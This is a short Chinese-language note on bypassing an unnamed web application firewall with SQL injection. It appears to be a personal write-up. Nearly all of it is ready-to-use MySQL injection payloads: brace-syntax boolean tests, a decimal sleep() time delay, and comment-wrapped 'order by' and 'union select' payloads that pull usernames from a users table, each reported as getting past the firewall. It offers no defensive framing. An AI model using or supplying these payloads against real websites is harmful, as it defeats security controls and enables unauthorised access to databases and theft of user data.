sql注入绕过某waf

简单布尔判断

直接输入and 1=1拦截

使用mysql黑魔法

and{a 1=1} and{a 1=2}不拦截

本地mysql测试语句正常执行

简单延时判断

and sleep(1)

简单测试后在()中添加.即可绕过 and sleep(1.1)

order by

and{a%201="/*"}%20order%20by%209%20--%20*/

union联合查询

和order一个思路

%20and{a%201="/*"}union%20select%201,2,username%20from%20users%20--%20*/